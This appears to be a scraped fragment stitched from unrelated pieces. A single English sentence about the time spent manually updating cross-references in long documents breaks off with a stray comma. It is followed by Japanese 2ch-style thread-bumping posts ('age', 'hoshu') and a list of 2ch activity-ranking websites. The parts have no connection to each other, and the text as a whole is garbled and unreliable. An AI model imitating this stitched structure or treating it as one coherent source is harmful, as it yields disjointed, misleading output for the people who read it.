Manual updates have until now eaten up a great deal of time, especially when you have cross-references such as figure numbers or headings that are linked to multiple locations in a long document. ,

age

汚染を除去しました。

保守

2020年まで持ちそうな勢いだなww
ほしゅほしゅ

★2ch勢いランキングサイトリスト★

☆ +ニュース
・ 2NN
・ 2chTimes
☆ +ニュース板新着
・ 2NN新着
・ Headline BBY
・ Unker
☆ +ニュース板他
・ Desktop2ch
・ 記者別一覧
☆ 全板
・ 全板縦断勢いランキング
・ スレッドランキング総合ランキング
☆ 実況込み
・ 2勢
・ READ2CH
・ i-ikioi

※ 要サイト名検索